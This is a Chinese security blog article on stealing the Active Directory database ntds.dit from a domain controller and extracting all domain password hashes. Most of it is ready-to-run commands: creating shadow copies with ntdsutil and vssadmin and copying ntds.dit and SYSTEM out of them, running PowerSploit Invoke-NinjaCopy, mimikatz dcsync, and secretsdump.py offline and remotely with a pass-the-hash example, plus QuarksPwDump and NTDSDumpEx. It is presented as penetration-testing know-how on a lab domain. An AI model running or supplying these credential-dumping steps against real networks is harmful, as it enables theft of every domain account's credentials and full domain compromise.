域之ntds.dit

  • A+
所属分类:安全文章
域之ntds.dit
点击上方蓝字 关注我吧


ntds.dit



ntds.dit为ad的数据库(C:WindowsNTDS),内容有域用户、域组、用户hash等信息,域控上的ntds.dit只有可以登录到域控的用户(如域管用户、DC本地管理员用户)可以访问。

ntds.dit包括三个主要表:数据表、链接表、sd表。所以只要在域渗透中能够获取到ntds.dit就可以获取到所有域用户的用户名和对应的hash,ntds.dit是加密的,需要获取system来解密。查看dit数据库可使用https://github.com/yosqueoy/ditsnap工具。



离线获取ntds.dit



vss快照方式

vss即Volume Shadow Copy Service。win2003及以上有,用于创建数据备份的快照功能。


ntdsutil

查看当前快照列表和已经挂载的快照
ntdsutil snapshot "List All" quit quitntdsutil snapshot "List Mounted" quit quit

创建快照
ntdsutil snapshot "activate instance ntds" create quit quit


域之ntds.dit


挂载快照

ntdsutil snapshot "mount 521972bf-3b80-470c-aa9b-f40ee0f9be57" quit quit


域之ntds.dit


复制出来ntds和system

copy C:$SNAP_202009131458_VOLUMEC$windowsNTDSntds.dit c:ntds.ditcopy C:$SNAP_202009131458_VOLUMEC$windowssystem32configSYSTEM c:SYSTEM


域之ntds.dit


卸载和删除快照

ntdsutil snapshot  "unmount {521972bf-3b80-470c-aa9b-f40ee0f9be57}" quit quitntdsutil snapshot  "delete {521972bf-3b80-470c-aa9b-f40ee0f9be57}" quit quit


域之ntds.dit


vssadmin

查看快照

vssadmin list shadows


创建快照

vssadmin create shadow /for=c:


域之ntds.dit


复制出来ntds和system

copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy3windowsNTDSntds.dit c:ntds.ditcopy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy3windowssystem32configSYSTEM C:SYSTEM


删除快照

vssadmin delete shadows /for=c: /quiet

PS:直接是无法访问?快照中的内容的,需要创建链接才可以:

mklink/dc:vssfile\?GLOBALROOTDeviceHarddiskVolumeShadowCopy3


nishang:copy-vss.ps1

nishang的Copy-VSS.ps1可进行快捷的
开启ps执行脚本权限:

Set-ExecutionPolicy Unrestricted


copy到当前目录:

Copy-VSS


msf:psexec_ntdsgrab

msf模块psexec_ntdsgrab可利用vss导出,再离线破解。
admin/smb/psexec_ntdsgrab

NinjaCopy方式

在powersploit中提供了不调用vss的方式ninjacopy。ps文件下载地址:
https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-NinjaCopy.ps1
开启ps执行脚本权限:
Set-ExecutionPolicy Unrestricted


导入ps模块并导出ntds:


Import-Module .invoke-NinjaCopy.ps1Invoke-NinjaCopy -Path C:WindowsSystem32configSYSTEM -LocalDestination C:\systemInvoke-NinjaCopy -Path "C:windowsntdsntds.dit" -LocalDestination "C:\ntds.dit"


域之ntds.dit




ntds.dit中提取hash



mimikatz

在服务器直接mimikatz即可,就不用上面的离线导出ntds.dit了,有杀毒软件等情况还是需要离线导出。
lsadump::dcsync /domain:fox.com /all /csv

secretsdump.py

Impacket包中的py:
secretsdump.py -ntds ./ntds.dit -system ./SYSTEM LOCAL

域之ntds.dit


得到域管用户密码或hash情况下,可远程连接导出:
secretsdump.py fox/admintests:[email protected]16.58.147或者secretsdump.py fox/[email protected]16.58.147 -hashes aad3b435b51404eeaad3b435b51404ee:621cdf4b49c06ec28caa7a6cab4ebac8

域之ntds.dit


QuarksPwDump.exe

先使用windows自带的esentutl修复下ntds.dit文件:
esentutl /p /o ntds.dit

再使用QuarksPwDump.exe进行提取


.QuarksPwDump.exe --dump-hash-domain --output userhash.txt --ntds-file .ntds.dit


域之ntds.dit


NTDSDumpEx

相当windows的secretsdump,下载地址:https://github.com/zcgonvh/NTDSDumpEx
.NTDSDumpEx.exe -d ntds.dit -s SYSTEM


域之ntds.dit


PS:搭建域环境时候随便敲的域名为fox.com,与其他无关。

域之ntds.dit
域之ntds.dit
原创 | 域之ntds.dit

域之ntds.dit
点分享
域之ntds.dit
点点赞
域之ntds.dit
点在看

本文始发于微信公众号(SecIN技术平台):原创 | 域之ntds.dit

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: